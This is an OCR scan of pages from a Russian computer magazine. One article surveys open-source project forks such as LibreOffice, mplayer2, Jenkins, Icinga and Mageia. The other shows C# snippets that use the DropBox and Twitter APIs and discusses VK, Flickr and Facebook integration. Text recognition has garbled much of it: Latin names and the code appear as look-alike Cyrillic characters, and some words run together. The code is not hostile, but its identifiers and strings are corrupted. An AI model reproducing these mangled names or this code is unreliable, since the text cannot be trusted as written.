3.3 (переработанный диалог печати, поле для поиска 
на панели инструментов, возможность задать пароль 
на редактирование документа, число строк в таблицах 
Саіс увеличено с 65000 до 1 миллиона и многое дру- 
гое), а также получил ряд уникальных функций: 

• Возможность импорта и редактирования 5Ѵ6- 
изображений; 

• Мастер для облегчения создания титульных страниц 
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(ѴѴгі(ег); 

• Был серьезно доработан инструмент «Навигатор» 
(тот, который по умолчанию забинден на <Р5>), в 
частности, все заголовки теперь могут отображаться 
древовидно; 

• Возможность импорта документов М3 ѴѴогкз и Боіиз 
ѴѴогб Рго, сильно улучшен импорт файлов ѴѴо гсі Ре гбесі; ; 

• Добавлен режим, включающий некоторые экспери- 
ментальные функции (например, интерактивное ре- 
дактирование формул в документе), стабильная работа 
которых не гарантируется. Функция активируется в 
«Сервису Параметры -> ЫЬгеОІІісе Включить экс- 
периментальные (нестабильные) возможности»; 

• Поддержка трех разных синтаксисов определения 
формул: Саіс А1 , Ехсеі А1 и Ехсеі Р 1 С 1 ; 

• Ускорение импорта 005, Ехсеі и ОВР; улучшена со- 
вместимость с Ехсеі, добавлена поддержка импорта 
диаграмм в формате рріх. 

Многие дистрибутивы включили ЫЬгеОІІісе 3.3 вместо 
ОрепОІІісе в поставку по умолчанию: ІІЬипІи 11.04, 
Ребога 15, ореп51)5Е 1 1.4, Мапбгіѵа 2011. ЫЬгеОІІісе 
будет участвовать вѲоодІе5иттего1 : Собе2011 с 
несколькими проектами (самый интересный из них, на 
мой взгляд, — возможность импорта Ѵізіо-файлов). 

Мультимедиа войны 

Реальность мира 0 реп Зои гее такова, что любой более- 
менее большой проект с более-менее долгой историей 
периодически форкают. Причем, нередки случаи, 
что форк поддерживается одним разработчиком. До 
того момента, пока ему не надоест. Этой же участи не 
удалось избежать и ппріауег (которому, кстати, в конце 
прошлого года исполнилось 1 0 лет). Довольно из- 
вестен форк под названием ппріауегхр, использующий 
многопотоковое ядро (к слову, ванильный ппріауег 
тоже с недавних пор умеет декодировать видео в 
несколько потоков). Менее известен форк тріауег- 
ѵѵѵѵ — ѴѴі псіоѵѵз-оп Іу, многопоточный, с поддержкой 
воспроизведения формата РМР (РІауЗіаІіоп РогІаЫе), 
поддержкой ОЗР-плагинов ѵѵіпаппр и множеством 
других мелких изменений. Совсем недавно появился 
новыйфорк — ни много ни мало — тр1ауег2. Причины 
создания форкадоконцанеясны.асписокосновных 
отличий содержит следующие пункты: 

• улучшенная обработка пауз. В ванильном ппріауег 
выполнение любой команды снимает паузу. В 
трІауег2 такое поведение исправлено; 



гѵГЬіі 
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• доо.дІ/АѴѴН2р 

— блог Ооситепі 
Роипбаііоп 

• доо.дІ/РТ6г8 — 
полный сЬапдеІод 
ЫЬгеОНісе 3.3 

• доо.дІ/9ВЬиЕ — 
список проектов 
ЫЬгеОНісе на боодіе 
Зиттег оі Собе 201 1 

• доо.дІ/86к — 
сравнение Ісіпда и 
Ыадіоз 
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ІШІХОЮ 



Форки всех времен и народов 



Кроме описанных в статье, можно выделить следующие проекты- 
форки, затмившие свои оригиналы: 

• РігеЬх — браузер №2 по популярности в мире. Родился как форк 
МоДИа Арріісабоп 5иіІе путем отсечения всего лишнего; 

• Х.Огд — форкХРгее86, возникший, в основном, из-за разногласий 
по поводу лицензии; 

• ІІЬипІи — форк РеЫап, дистрибутив №1 на десктопах с жестким 
циклом релизов; 

• ОрепВБй — самый секурный вариант В5Р. Мало кто помнит, что 
это форк ІЧеіЕ>50, возникший в 1995 году из-за конфликта среди 
разработчиков; 

• Чоотіа — одна из самых популярных СМ5, начала свое развитие 
как форк когда-то популярной СМ5 МатЬо. 



• улучшение поддержки формата Маігозка; 

• автоматическая поддержка многопоточности без необходимо- 
сти отдельного конфигурирования; 

• улучшенная поддержка технологии ІЧѵібіа V О РА II , позволяющей 
перекладывать декодирование видеопотока на 6РІІ; 

• убрана зависимость от встроенной версии РРтред, переход на 
использование стандартного РРтред АРІ; 

• удалили тепсобег (мотивировав это тем, что у него ужасный 
код, который нереально поддерживать). Обещают в следующих 
версиях предложить какое-нибудь свое решение, в частности, 
некоторые функции перекодирования планируется возложить на 
сам тр1ауег2; 

• удален штатный 0111-интерфейс. 

Для тестирования доступен релиз-кандидат версии 2.0, который 
пока полностью совместим с оригинальным тріауег. Вроде бы, 
сама по себе идея неплоха, но активность в багтрекере проекта 
и списках рассылки показывает, что если проект не поддержит 
широкая общественность — это будет очередной всеми забытый 
форк. 

61)1 к тріауег фор кают еще чаще. Встречайте новичка — 
ІІМРІауег, форк ЗМРІауег. Недавно вышла версия 1.0, хотя, судя 
по количеству багов в багтрекере и отзывам, зря его уже назвали 
релизом. В отличие от прародителя, форк доступен не только под 
ѴѴіпбоѵѵз и Ьі п их, ной под Мае 05 X. Другие его особенности: 

• скины написаны на С 55. В комплект поставки уже включено 
несколько СКИНОВ; 

• умеет искать, воспроизводить и сохранять ролики с УоиІиЬе; 

• умеет проигрывать 5Н 0 БІТсазІ- потоки; 

• поиск субтитров на орепзиЫІНез.огд . 

Обычно форк — достаточно мирное мероприятие. Максимум — 
часть разработчиков уходит, громко хлопнув дверью и сказав что- 
нибудь нелицеприятное напоследок. Но случаются и исключения. 
Например, с РРтред — в начале года группа разработчиков 
попыталась совершить «государственный переворот». Причем, 
ни у кого из этой группы не было права записи изменений в діі- 
репозиторий, поэтому они просто его склон провал и и поменяли 
ссылку на сайте на новый, заодно максимально урезав права 
остальным членам сообщества. Мотивами такого поступка послу- 
жили многочисленные проблемы в процессе разработки, которые 
не решаются годами, снижение темпа развития проекта, а также 
то, что проект, фактически, находится в руках одного мейнтейне- 
ра. В общем, со стороны ситуация выглядит очень некрасиво. По- 
сле продолжающихся несколько месяцев переговоров и метаний 
группа «революционеров» все же решила, что сделать форк — 
правильнее. Назвали форк БІЬаѵ. Одна из основныхтехнических 
целей форка — устранение фрагментации проекта на большое 
количество вспомогательных библиотек. 




Нередкое явление и форки узкоспециализированных проектов. 

Вот несколько недавних. 

От проекта Ооза откололся форк РизіопОігесІогу. Ооза — 
специализированная веб-морда к ЮАР для управления учетными 
записями пользователей, рабочих станций, группами, правами и 
многим другим. Причина форка: разработкой Ооза занимается, 
в основном, немецкая компания 601410145 ОтЬН, и внесение 
изменений (особенно, в ядро) сторонними разработчиками 
затруднено. 

Система управления проектами Ребтіпе была форкнута 
небольшим количеством старых разработчиков. Форк получил 
название СЫІіРго)есІ, а произошло это в феврале 201 1 года. 
Мотивы форка — сделать процесс разработки (в особенности, 
принятия новых патчей в ирзігеат) более прозрачным, улучшить 
взаимодействие СбіІіРгоіесІ: с другими проектами и сотти- 
пііу. Цели достойные, но пока форк развивается существенно 
медленнее оригинала. 

Система непрерывной интеграции Нисізоп — довольно известный 
в узких кругах проект 5ип, который ныне принадлежит Огасіе. 

В ноябре 2010 года на хостинге проекта ( ) были без 

предупреждения заблокированы списки рассылки и репозитории 
(как потом выяснилось — в связи с обновлением). Разработчикам 
это не понравилось, и они перенесли код на діібиб, заодно 
переименовав проект в бепкіпз (так как Огасіе отказалась передать 
сообществу имя Нисізоп). Правда, некоторое время спустя у Огасіе 
появилось желание передать Нисізоп под управление сообщества, а 
конкретно — организации Есіірзе Еоипбабоп. 

Программ для мониторинга сети Епіегргізе-уровня с 0реп5оигсе- 
лицензией очень мало. Относительно недавно одна из них, ІЧадіоз, 
обзавелась форком под названием Ісіпда. Форк был реакцией на 
чрезмерное «закручивание гаек» компанией ІЧадіоз Епіегргізез. 
Сегодня Ісіпда развивается гораздо быстрее своего «прародителя» 
и уже имеет множество собственных фишек, среди которых: 

• Переработан классический веб-интерфейс на С и написан 
новый, альтернативный на РНР и А)ах; 

• Данные мониторинга можно хранить в БД. Пользователей 
системы тоже можно хранить в БД (или в ЮАР); 

• Полная поддержка ІРѵб, а также возможность мониторинга 
смешанных ІРѵ6/ІРѵ4-сетей; 

• Наличие АРІ (ХМБ, 650ІЧ, 50АР); 

• Возможность конфигурирования из веб-интерфейса. 

При этом Ісіпда пытается сохранить максимальную совместимость 
с ІЧадіоз. 

Игры тоже форкают. Недавний тому пример — довольно 
популярный ЕР5 ІЧехиіг. Один из основателей проекта (Бее Ѵег- 
теиіеп), который уже очень долгое время в проекте не участвовал, 
передал права на код и название молодой игровой компании 
ІШюпіс. Компания закрывает код (который ранее распространялся 
только под лицензией 6РБ) и разрабатывает версию для игровых 
консолей. Сообщество ответило на эти действия созданием форка 
под названием Хопоііс. Планируется в дальнейшем избежать 
ситуаций, в которых весь код будет принадлежать только одному 
человеку. 



Битвы титанов 



Довольно часто бывает, что разработчики не мелочатся и делают 
форк целых дистрибутивов/ОС. 

Последнее время дела у Мапбгіѵа шли совсем неважно — компа- 
ния потеряла около 30 миллионов евро и вынуждена была уволить 
большое количество своих сотрудников. Чтобы спасти дистри- 
бутив, бывшие сотрудники и члены сообщества сделали форк 
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Ііпих МіпІ 



— Мадеіа, управляемый независимой некоммерческой органи- 
зацией. Первый релиз ново го дистрибутива с точки зрения поль- 
зователя практически ничем не отличается от Мапбгіѵа 2010.1 : 
лишь ребрендинг, новые версии пакетов и замена ОрепОІТісе на 
ГІЬгеОІТісе. 

Сточки зрения сообщества, наоборот, была проделана огромная 
работа — с нуля создана вся инфраструктура: система для сборки 
пакетов (с помощью которой собрано больше 1 0000 пакетов), сайт 
(блог, ѵѵі кі ) , багтрекер, списки рассылок, форумы, ІРС-каналы и 
многое другое. В общем, первая версия — это проба сил сообще- 
ства и инфраструктуры. Касательно грядущих версий четких пла- 
нов пока нет. Тем временем, Мапбгіѵа тоже готовится к следующе- 
му релизу — Мапбгіѵа 2011, который запланирован на середину 
июня. Время покажет, который из дистрибутивов-близнецов 
окажется жизнеспособнее. 

Гораздо более интересен в плане перспектив фор к Ап сі гоісі 
под названием ІсебРоЬоІ, который пока развивают всего два 
разработчика. Цель форка — заменить Оаіѵік Ѵігіиаі МасЫпе 
(реализация Оаѵа, которая используется в АпбгоісІ) на ОрепОйК 
(реализация Оаѵа, распространяющаяся под ОРГ), при этом не 
потеряв совместимости с уже написанными приложениями. Для 
этого планируется сначала модифицировать Оаіѵіктак, чтобы он 
не зависел от используемого в АпбгоісІ ядра. Затем нужно будет 
создать прослойку, преобразующую байткод Оаіѵік в байткод 
Ореп^К. Плюсов оттакого перехода два: 

• возможность запускать АпбгоісІ-приложения везде, где работает 
Ореп^К; 

• к Ореп^К нет никаких претензий по поводу нарушенных па- 
тентов (по крайней мере, у основных игроков рынка в настоящее 
время). 

Иногда история фор ко в ОС принимает причудливые формы. 
Жил-был себе ОеЬіап, и однажды на его основе сделали форк — 
ГІЬипІи, который по популярности на десктопах в разы обошел 
своего прародителя. 

Через некоторое время уже на основе ГІЬипІи сделали еще один 
дистрибутив для десктопа — Гіпих Міпі, который по популярности 
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Просмотр 




Пока в проекте СЫІіРго|есГ катастрофически мало 
участников 




Современная ІІЬиггіи с КОЕ 3.5 



догоняет ГІЬипІи (по крайней мере, на сІізІгоѵѵаІсЬ.сот он уже 
давно и уверенно держится на втором месте). Кстати, недавно 
вышел релиз за номером 1 1 (кодовое имя Каіуа), который от 
ГІЬипІи 1 1 .04 отличается отсутствием Гіпііу (вместо него — ста- 
рый добрый ламповый Ѳпоте 2.32), наличием кодеков (а также 
біаз Гі р Іауе г, ипгаг) из коробки (только в ОѴО-редакции), фирмен- 
ным оформлением в зеленых тонах и несколькими собственными 
утилитами: 

• ппіпІМепи — замена стандартного меню ОІЧОМЕ; 

• тіпііпзіаіі — менеджер приложений, по функциональности 
схожий с Центром приложений в ГІЬипІи; 

• тіпШрсІаІе — менеджер для гибкой установки обновлений; 

• тіпІВаскир — очень простая тулза для бэкапов. 

В отличие от ОС, ОЕ — одна из тех областей, где форки появляют- 
ся очень редко. Думаю, тут все дело в их большом разнообразии и 
трудоемкости поддержки. 

Но изредка такое случается. Один из самых свежих примеров — 
форк КОЕ 3.5. С выходом КОЕ4 разработчики КОЕ объявили эту 
ветку устаревшей и забросили. Но так как не все были готовы рас- 
статься с 3.5, получился форк — Тгіпііу Оезкіор ЕпѵігоптепГ 
Для проекта, заброшенного основной массой создателей, разра- 
ботка идет довольно бодро: выпущено несколько релизов с мел- 
кими улучшениями, имеются грандиозные планы по переписыва- 
нию на 01:4 и смене НАГ на исіеѵ. На сайте ( ѵѵѵѵѵѵ.ігіпііѵсіезкіор.огд ) 
можно скачать пакеты для свежих ОеЬіап/ГІЬипІи, РРМ-пакеты 
для РебНаі/ЕесІога и ОрепЗГІЗЕ ожидаются в ближайшем буду- 
щем. 

То *огк ог по* *о *огк 

Обычно форк приводит к «распылению» сил разработчиков. Но, 
бывает, что это единственный выход, и после этого проект обрета- 
ет вторую жизнь. 

Так случилось, например, сХ.Огд, который в 2004 году откололся 
отХЕгее86 из-за разногласий по поводу новой лицензии. 

В результате форк сейчас гораздо популярнее своего прародите- 
ля. Еще один удачный пример — 6СС. В 1997 году был создан форк 
ЕѲС5, который включил в себя ряд экспериментальных возмож- 
ностей. Впоследствии проекты объединились, основой «нового 
ѲСС» стал ЕѲС5. пт 
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«СОЦИАЛЬНЫЙ» кодинг 

НАСИШАРПЕ 



Покоряем ОгорЬох, ѴК, Ріікг и РасеЬоок 
одним ударом 



©Твиттер, «В Контакте», РасеЬоок... Прочитал френд-ленты во всех 
сетях - и день прошел бездарно. Как быть? Как за всем уследить? 
Пожалуй, решение одно - автоматизация и фильтрация лишнего 
контента. Как это сделать? Как подружить свою программу с чужи- 
ми проектами? Об этом и поговорим в статье. 

работники социальных сетей (а также различных полезных сервисов] это 
поняли и сейчасактивноулучшаютинтерфейсы для взаимодействия с 
другими сервисами и программами. Выгода очевидна для всех. Поль- 
зователю не нужно разрываться между разными проектами. С помощью 
специальных средств он можетзаходить в один сервис, но всегда быть в 
курсе того, что творится на другом. Воттебе реальный пример. На портале 
сообщества ѵѵѵѵѵѵ.ѵг-опііпе. ги настроена интеграция ста кими социаль- 
ными сетями, какТѵѵіиег и «В Контакте». Стоило один раз все поднять — и 
теперь при добавлении нового контента его анонс мгновенно улетает в 
твиттер и контакт. Вроде мелочь, а в итоге — пользователи обеих социаль- 
ных сетей сразу становятся в курсе обновления. Удобно?! Думаю, да. 
Честно говоря, это еще мелочи. Экспорт материала — это лишь вершина 
айсберга. Главная вкусность заключается в возможности использования 
системы авторизации социальных сетей для своего проекта. Проще всего 



Что значит «взаимодействовать»? 

Изначально социальные сети строились какотдельные проекты. Об 
объединении с похожими ресурсами не было и речи. Наверное, основной 
идеей был охват пользователей. «Зачем делиться посетителями, если их 
можно собрать всех?», —думали многие. Ксчастью, времяделаетсвое 
дело, и после старта в России «В Контакте» стал и появляется альтерна- 
тивы. Причем альтернативы с хорошим финансированием — «Мой мир», 
«Одноклассники» и т.д. В основе всех этих проектов лежит одна и та же 
идея. Тем не менее, каждый из них старается выделиться и предоставить 
пользователюуникальные фишки. Вот бедным пользователям и прихо- 
дится разрываться. Водной сети — куча друзей, в другой —до фи га левого 
контента, втретьей — тусуются заказчики и работодатели... 

Выбрать для себя один сервис на все случаи жизни уже нереально. Раз- 
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Рисунок 1. Регистрируем новое приложение в ОгорВох Рисунок 2. РасеЬоок С# 5ЭК на СосІеРІех 



ЗНАКОМИМСЯ С РРОРВОХ 



// Инициализация объекта типа ОгорВох.ОгорВохСгесІепііаІБ 
// Объект используется для установки значений, используемых 
// для доступа к учетной записи ОгорВох 
ОгорВох. ОгорВохСгесІепііаІБ туСгесІепііаІБ = пеы АррІ_ітз±. 
СІоисІСотриііп^ . БбагрВох . ОгорВох . ОгорВохСгесІепііаІБ ( ) ; 

// Ключ, полученный при регистрации нового приложения 
туСгесІепІііаІБ .СопБитегКеу = п кх5с1я117р11с11:су"; 

// Секретная фраза, полученная при регистрации 
туСгесІепІііаІБ .СопзитегЗесгеІ: = м сІІііл/5сІѵ1гтхіл/62ое" ; 

// Вводим данные своего аккаунта 
// (имя пользователя и пароль) 
туСгесІепІііаІБ .ІІБегІМате = "ап1іоп(а)§таі1 . сот"; 
туСгесІепІііаІБ . Рэббыогсі = "13241414"; 

// Получаем стандартную конфигурацию хранилища ОР 
ОгорВох. 0горВохСопб§ига1ііоп туСопб§ига1ііоп = 

ОгорВох. 0горВохСопб§ига1ііоп.Сіе1і51іапсІагсІСоп1і§ига1ііоп(); 

С1оисІ51іога§е ту51іога§е = пеы С1оисІ51іога§е( ) ; 

// Если открыть хранилище не удалось, 

// то прекращаем работу 

і-р ( !ту51іога§е.0реп(туСоп6§ига1ііоп, туСгесІепІііаІБ) ) 

{ 

М5§Вох("Не удалось открыть хранилище!"); 

геіигп; 

> 

//Если все ок, то можем приступать к загрузке/выгрузке файлов 
ту51:ога§е.ІІр1оасІРі1е("аг1:іс1е_-Рог_х.1:х1:", 
"/МуРиЬІісОігесІіогу"); 

ту51іога§е . 0омп1оасІРі1е( "/МуРиЬаг1ііс1е_Тог_х . іхіі " , 

"С:\\"); 

// В конце необходимо проверить открытость 
// хранилища 

// Если оно открыто, то принудительно закрываем 
і-р (ту51:ога§е.І50репесІ) 

{ 

ту51:ога§е.С1о5е(); 

} 

это представить на примере ѵѵеЬ-проекта. Не буду далеко ходить и в каче- 
стве примера вновь назову свой любимый ѵѵѵѵѵѵ.ѵг-опііпе. ги . 

Однажды нам потребовалось привлечь новых посетителей. Привлекать 
решили из популярной социальной сети «В Контакте». Найти людей, 
которых можетзаинтересовать проект, не проблема. Гораздо труднее 
«сдвинуть» их с места и добиться того, чтобы они зарегистрировались 
на нашем ресурсе (ну и стали его посещать). Сегодня каждый второй 



АІІТН АВТОРИЗАЦИЯ 



іібіп§ Тыее1:51іагр; 

Тыі1:1:ег5егѵісе 1:м5 = 

пеы Тмі1:1:ег5егѵісе("твой_ключ", "твой_секрет" ) ; 

//Получаем ключ 
ОАи-рбКециеБ-рТокеп гецТокеп = 

-Ы5 . Се1:Керие5І:Токеп( ) ; 

//Перенаправляем на игі оАиІіб авторизации 
ІІгі игі = іыб . СеіАиібогІЕа'ііопІІгі ( гецТокеп ) ; 

Ргосезз . 5і:агі:(игі . То51:гіп§( ) ) ; 

//Обмен запрошенного ключа на ключ доступа 
5І:гіп§ ѵегібег = "123456"; //Указываем верификатор 
ОАиіІіАссеББТокеп ассезз = 

5егѵісе.Се1:Ассе55Токеп(герие5І:Токеп, ѵегібег); 

//Производим аутентификацию и получаем лист упоминаний 
5егѵісе.Аи1:Ііеп1:іса1:еІлІі1:Іі(ассе55 .Токеп, ассезз . 
ТокепБесгеІ:); 

ІЕпитегаЬ1е<Тыі1:1:ег51:а1:и5> тепііопБ = 
зегѵісе . Ііз1:Тмее1:5Меп1:іопіп§Ме( ) ; 

ресурстребует регистрации, и многие уже задолбались выдумывать 
себе разные логины и пароли. Наш ресурс в этом плане не отличается 
оригинальностью. Чтобы упростить дорогим посетителям жизнь, мы 
решили настроить взаимодействие сайта с социальной сетью «В Кон- 
такте» и обеспечить пользователям возможность входить на наш ресурс 
путем авторизации через контакт. Другими словами, для входа на наш 
сайт пользователю требуется авторизоваться во «В контакте» — и все. 
Результат не заставил себя дол го ждать — новые пользователи стали 
охотно пользоваться этой фичей. Сейчасты можешь подумать, что по- 
добные взаимодействия актуальны лишь для сайтов, а для десктопных 
приложений действуют иные правила. Это не та к. Ты запросто можешь 
использовать подобныетрюки и в десктопных приложениях. Допустим, 
ты решил закодить очередной и неповторимый I СО- клиент (Хотя, кто в 
наши дни еще пользуется аськой?). Однозначноты получишь допол- 
нительных юзеров, если снабдишь свое творение поддержкой обмена 
сообщениями через «В Контакте», «РВ» и т.д. Сделаешь все это красиво 
и качественно — твоими пользователями станут нетолько асечники, но 
и конта ктники (как пример). Помни, что рост количества пользовате- 
лей твоего проекта существенноувеличиваетшансзаработатьна нем 
кругленькую сумму американских президентов. 

Во всех предыдущих абзацах я только и делал, что говорил о социаль- 
ных сетях. Однако, все вышеописанное можнотакже отнести и кдругим 
сервисам. На просторах интернета есть много интересных проектов, 
которые готовы предоставить доступ ксвоему функционалу. Тебе лишь 
остается придумать, какэтим можно воспользоваться и получить мак- 
симальную выгоду. Не нужно изобретать очередной велосипед — лучше 
взять готовую двухколесную хреновину и прикрутить к ней атомную тур- 
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Рисунок 3. 
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бину. Далее в статье я буду рассказывать не только о работе с соцсетями, 
но и сдругими полезными ѵѵеЬ-сервисами. 

Это можно делать по-разному 

Разработка приложений, направленных на взаимодействие с социаль- 
ными сетями, практически ничем неотличаетсяотпрограммирования 
других сетевых приложений. Втвоем распоряжении — бесконечный по- 
лигон возможныхсценариев. Например, ты можешьблеснутьзнаниями и 
быстренько все реализовать при помощи уже знакомых сокетов и метода 
научного тыка. То есть, берем анализаторы трафика и натравливаем их на 
бродил ку. Дальше смотрим, какиезапросыотправляетбраузер на сайт 
нужного сервиса и эмулируем все это дело втвоей программе. Способ, не- 
сомненно, надежный, но крайнетрудный для реализации. Одна отладка 
стадии работы с сокетами чего толь ко стоит. Я уже молчу про бесконечные 
разборы полетов с анализом запросов. 

Ксчастью.улюбой задачи есть несколько решений. И наша — не исклю- 
чение. Помнишь, я говорил, что разработчики подобных проектов стара- 
ются идти навстречу и для удобства предоставляютхорошо документиро- 
ванный АРІ? Считай, тебеуже не нужно разбираться в тон костях протокола 
обмена информацией. Достаточно следовать официальному мануалу и 
почаще заглядывать в примеры. Этотспособужелучше, чем предыдущий, 
но воздух все равно насыщен запахом отладки и бессонной ночи. Какой 
бы хорошей ни была документация, всегда найдется непредвиденная 
ситуация, которая существенно затормозит процесс разработки. 

Быть может, есть способ еще проще? Нуты и лентяй! Шучу-шучу, не мне 
тебя корить, я сам ленивый. Ктомуже, более простой способ действитель- 
но есть. Неты первый и неты последний программист, решивший напи- 
сать программу для работы сХ-сервисом. Этим вопросом озадачивались 
многие программисты, и самые матерые из нихуже давно выплеснули 
свой опытвуниверсальные библиотеки и модули. Такое добро реально 
найти практически для всехпопулярныхязыков программирования. Про- 
ще этого способа, пожалуй, нет ничего. 

Вместительное файловое 
хранилище 

Уже два года я пользуюсь услуга ми чудесного бесплатного сервиса — 
ОгорВох ( сІгорЬох.сот ). Если еще есть танкисты, которые не слышали 
про ОгорВох, рассказываю. ОгорВох — это сервис, позволяющий поднять 
синхронизациюфайлов между всеми своими компьютерами. Твои файлы 
хранятся на серверах ОгорВох и автоматически копируются на компью- 
теры, участвующие в синхронизации. Получается некий файлообменник. 
Только в отличие отальтернативных проектов, ОгорВох предоставляет 
достаточно шикарную бесплатную версию. Суди сам, тебе да ют 2 Гб 



места под файлы и полнофункциональную версию клиента. Что?! Мало 
места? Да, сегодня объемы нужной информации зашкаливают, поэтому 
двух гигабайт может и не хватить, но это не означает, что ОгорВохтебе 
не подойдет. Ты можешь по дешевке взять платныйтариф или немного 
прокачать свой бесплатный аккаунт. Разработчики регулярно проводят 
всякие конкурсы и мероприятия, позволяющие без особыхзатруднений 
поднять дополнительное место. Например, я уже прокачал своюучетку 
до пяти гигабайт. Ладно, вернемся кнашим баранам. Я уже сказал, что 
ОгорВох — замечательный сервис, грех не воспользоваться им в своих 
личных целях. Ксчастью, разработчики уже давно открыли АРІ, а энту- 
зиасты даже выпустили свои варианты классов и библиотек. Поскольку 
мы ориентируемся на С#, то нашим выбором станет надстройка ЭбагрВох 
( збагрЬох.сосІерІех.сопп ). Это бесплатный набор классов, позволяющий 
эффективно использовать функции ОгорВох из своего приложения. 
Проектактивно развивается и на данный моментуже может похвастаться 
полной поддержкой всех функций ОгорВох. Одно время при использова- 
нии библиотеки возникали проблемы, но версия отЗІ декабря 201 0 года 
исправила эту досадную ситуацию. Я не буду расписывать примеры от 
начала до конца, а буду приводитьлишь небольшие интересные отрывки. 
Дописать ихты всегда сможешь, воспользовавшись документацией и 
демками, идущими в комплекте. Перед тем как приступ итьксозданию 
своего первого приложения, взаимодействующего с ОгорВох, тебе необ- 
ходимо обзавестись аккаунтом на этом сервисе и зарегистрировать новое 
приложение в личном кабинете [ ЫірБУ/ѵѵѵѵѵѵ.сІгорЬох.сопп/сІеѵеІорегз/ 
аррз ). После регистрации нового арріісабопты получишь АррКеу и 
АррЭесгеГ Это уникальные ключи, без нихтвое приложение никогда не 
заработает. Итак, кактолько создашь новое приложение, можешь попро- 
бовать запустить Ѵ5, подключить к ней ЭбагрВох и накидать небольшой 
примерчик, демонстрирующий возможности библиотеки. Код моего тако- 
го приложения приведен во врезке «Знакомимся с ОгорВох» и снабжен 
обильными комментариями. В своем примере я демонстрирую загрузку 
и закачку файла с сервера ОгорВох. Остальные операции выполняются 
аналогичным образом. Подробности смотри в официальных примерах 
(см. ссылки во врезке]. 

Сишарпная щебеталка 

«Он слишком прост, чтобы в нем долго копаться»©. Это высказывание 
можно смело отнести копопсевшему сегодня сервису микроблогинга — 
Тѵѵіиег. Реально, заморские перцы из, казалось бы, банального проекта 
сделали сервис, который завоевал мир. Сначала в нем были лишь гики, 
затем пришли домохозяйки. Еще позже в скворечникзаджойнились 
знаменитости, и самыми последними подтянулись чиновники. Неуметь 
программировать приложения для работы сданным сервисом — верх 
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ССЫЛКИ ПО ТЕМЕ 



іі5Іп§ Тіл/ее1:5Ьагр; 

// Создаем объект типа Тыі1:1:ег5егѵісе 
// при помощи данного объекта мы будем читать 
// тайм-ленту 

Тыі1:1:ег5егѵісе туТмі1:1:ег5егѵісе = пем Тыі1:1:ег5егѵісе( ) ; 

ІЕпитегаЬ1е<Тыі1:1:еп51:а1:и5> 1:ыее1:5 = 

туТыі1:1:ег5егѵісе. И5І:Тыее1:50пРиЫісТіте1іпе( ) ; 

//Перебираем всю ленту и выводим. В консоль/форму 
■Рогеасіі (ѵа Іэл/ееі: іп ІіыееІіБ) 

{ 

Соп5о1е.ІлІгі1:еІ_іпе( ,, {0} - "{1}""., 

■вл/ее* . ІІвег . БсгеепІМате., Іііл/ееі: . Техі:) ; 

} 

кощунства. Сишарп-разработчикам как всегда повезло чуточку больше, 
чем другим. Уже больше года развивается одна из лучших клиентских 
библиотекдля взаимодействия с твиттером — ТѵѵіиегЭЬагр. Среди по- 
добных проектов этот выделяется в первую очередьтем, что прекрасно 
подходит какдля .Ы ЕТ (2-4), Мопо2.6,таки для новомодного ѴѴіпсіоѵѵб 
РЬопе 7. Поддержка работы под ѴѴР7 — одна из главных вкусностей. Эта 
ОС вышла совсем недавно, приложений под нее почти нет.Утебя еще 
есть все шансы создать неповторимый Тѵѵіиег-клиент и завоевать любовь 
пользователей. Где найти лучшее применение библиотеке Тѵѵіиег-ЭЬагр 
— ты решишь сам, а я продемонстрирую, как с ее помощью авторизовать- 
ся в чирикалке, используя ОАиіЬ, и получитьсписоксообщений своей 
ленты. Мой код ты найдешь во врез кахс говорящими названиями. Все 
необходимые пояснения я, какобычно, привел в комментариях. Полное 
описание классов смотри в... исходниках. Увы, пока хорошей документа- 
ции к библиотеке нет. 

«В контакте» 

под чутким надзором 

«В Контакте» — пожалуй, самая популярная в России социальная сеть. 
Одни используют ее для бесконечного трепа с друзьями, а другие, более 
продвинутые, — как площадку для продажи или рекламы своихтова- 
ровиуслуг. Крометого,«В Контакте» может похвастаться несметным 
количество не совсем легального медийного контента. Несмотря на 
популярность, в плане кодинга конта ктвыглядиточеньтухло. За все 
время существования этой сети так и не появилось качественного 5РК и 
качественной библиотеки для взаимодействия сторонних приложений 
с функциями социальной сети. Нет, нельзя сказать, что энтузиасты не 
предпринимали попытоксоздать шедевр. Попыток были, но практически 
все проекты немогутвыйти из стадии АІіа, либо стали заброшенными. Из 
того, что есть, наиболее выгодно выделяется проект ЗіІѵегІідЫ; ѵкопіакіе 
АРІ ( зіІѵегІідЬіѵкарі.соберІех.сот І. Его возможностей вполне хватит для 
решения типовых задач (публикация на стену, загрузка фотографий ит.д.). 
Примеры объемны для публикации, смотри исходники на диске. 

Дружим с РІіскг 

Рііскг не является социальной сетью, это просто сервис для хранения 
фотографий и видеороликов, созданный компанией ѴаЬоо. Проектимеет 
как платную, так и бесплатную версии. У последней есть ряд досадных 
ограничений, ноэто не помешало фликрузавоевать популярность среди 
блогеров. Если верить данным из ѴѴікіресІіа, то на конецсентября про- 
шлого года база фликра содержала около пяти миллиардов изображений. 
В отличие от неудобного в плане программирования «В Контакте», для 
работы с фликром на СосІеРІехе есть библиотека ЕІіскгІЧЕТ АРІ ЫЬгагу 
( ШскгпеГсосІерІех.сопп ). После подключения ее ксвоему проекту, работа 
с Еііскг’ом сведется к вызову нескольких методов. Примеры опять же не 
привожу, они ждуттебя на 0Ѵ0. 



• — исходники при- 
меров, демонстрирующие взаимодействие с РгорВох при 
помощи библиотеки ЭЬагрВох. 

• — здесь хостится библиотека 
РгорВох. 

• — месторасположение библиотеки 
ІѵѵееІзЬагр. 

• — сервисы сокращалок 
ссылок сегодня очень популярны. Хочешь создать удобную 
программу для работы сними? Тебе непременно нужно озна- 
комиться с этим примером. 

• — ЭіІѵегЫдЫ: АРІ Соппесіог для «В Кон- 
та кте». 

• — пример взаимодействия с сер- 
висом переводов от Ооодіе. 

• уй — официальная информация 

для разработчиков приложений для «В Контакте». 

• уу: іѵаг-31 71 — в 

этом номере бесплатного журнала для программистов ѴР- 
Опііпе есть статья, рассказывающая про взаимодействие с 
сервисом перевода от Ооодіе без использования сторонних 
библиотек. Рекомендую ознакомиться. 



Рулим РасеЬоок 

ЕасеЬоок — сеть малоизвестная, и ты наверняка о ней ничего не 
слышал :). Возможно, тебе захочется с ней познакомиться только 
потому, что в ней отвисает почти вся команда Хакера. В отличие от«В 
Контакте», для ЕасеЬоок’а существует множество вариантов ЭйК, мо- 
дулей ит.д. Стоитзайти натотже СосІеРІех, вбить в поиск «ЕасеЬоок» 

— и перед тобой вывалится несколько страниц с разными модулями/ 
библиотеками. Среди такого количества вариантов нетрудно и по- 
теряться. Особенно напрягает, что многие предложенные решения в 
